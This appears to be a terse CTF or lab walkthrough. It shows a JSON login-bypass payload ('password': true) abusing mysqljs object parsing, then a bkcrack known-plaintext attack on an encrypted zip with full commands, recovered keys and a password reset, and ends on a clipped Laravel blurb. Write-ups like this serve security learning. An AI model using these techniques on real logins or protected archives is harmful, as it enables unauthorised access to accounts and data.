Spent about an hour on Cookie, hoping to bypass authentication somehow.
Then hacktrick.xyz gave me a hint.
Still took sometime to bypass it.
00:43 Bypass authentication
https://book.hacktricks.xyz/pentesting-web/login-bypass
Finding an Authorization Bypass on my Own Website
The mysqljs parameterized query parser handles objects as column name and key, leading to alterations of the query.
Reading those two websites above, I first tried
{
"password":1
}
But it did not work. It should be bool true.
{
"password":true
}
01:00 Crack zip password
Check details of zip file.
unzip -l *.zip
7z l -slt *.zip
01:07 Plain text attack
How I Cracked CONTI Ransomware Group’s Leaked Source Code ZIP File
Leaker posted full zip with password
Installling bkcrack
wget https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz
$ /opt/bkcrack-1.5.0-Linux/bkcrack -C uploaded-file-3422.zip -c .bash_logout -P 2nd.zip -p .bash_logout
bkcrack 1.5.0 - 2022-07-07
[03:25:40] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[03:25:41] Attack on 56903 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
75.5 % (42942 / 56903)
[03:41:51] Keys
7b549874 ebc25ec5 7e465e18
$ /opt/bkcrack-1.5.0-Linux/bkcrack -C uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U uploaded-file-3422-pass.zip password
bkcrack 1.5.0 - 2022-07-07
[03:52:32] Writing unlocked archive uploaded-file-3422-pass.zip with password "password"
100.0 % (9 / 9)
Wrote unlocked archive.
02:07 Read Laravel codes
Laravel - The PHP Framework For Web Artisans
Laravel is a PHP web application framework with expressive, elegant syntax. We’ve already laid the foundation — freeing you to create without sweating the small...